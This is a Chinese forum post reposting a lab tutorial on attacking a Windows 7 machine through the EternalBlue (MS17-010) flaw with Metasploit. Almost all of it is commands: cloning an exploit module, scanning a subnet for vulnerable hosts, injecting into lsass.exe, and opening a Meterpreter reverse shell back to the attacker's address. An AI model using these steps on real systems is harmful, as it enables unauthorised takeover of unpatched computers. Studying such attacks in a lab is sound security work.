Ken1Ve 发布于2022年11月4日 分享 发布于2022年11月4日 其实我们这里所说的使用MSF 实现 “永恒之蓝”的快速攻击,就是利用Metasploit中针对ms17-101漏洞的攻击载荷进行攻击获取主机控制权限。我这里简单的记录下整个攻击利用所需要的工具准备、利用过程以及后渗透的一些简单内容。本次用到的环境:kali系统.ip地址:192.168.1.106目标靶机为:win7sp1x64系统(关闭防火墙),ip地址:192.168.1.102具体的步骤如下:kali系统下安装wine32:dpkg --add-architecture i386 && apt-get update &&apt-get install wine32git clone下载其利用脚本git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit然后将脚本拷贝到 /usr/share/metasploit-framework/modules/exploits/windows/smbcd Eternalblue-Doublepulsar-Metasploit/ cp -r deps/ eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smbnmap漏洞指定扫描:nmap -n -p445 --script smb-vuln-ms17-010 192.168.0.0/24 --open启动msf,然后进行一系列设置:service postgresql start msfconsolesearch eternalblue use exploit/windows/smb/eternalblue_doublepulsar进行攻击载荷的配置工作:set DOUBLEPULSARPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps set ETERNALBLUEPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps set PROCESSINJECT lsass.exe set TARGETARCHITECTURE x64 set rhost 192.168.1.102 show targets set target 8 set payload windows/x64/meterpreter/reverse_tcp show options set lhost 192.168.1.106 exploit效果如下 版权属于:逍遥子大表哥本文链接:https://blog.bbskali.cn/115.html按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。 链接帖子 意见的链接 分享到其他网站 更多分享选项…
推荐的帖子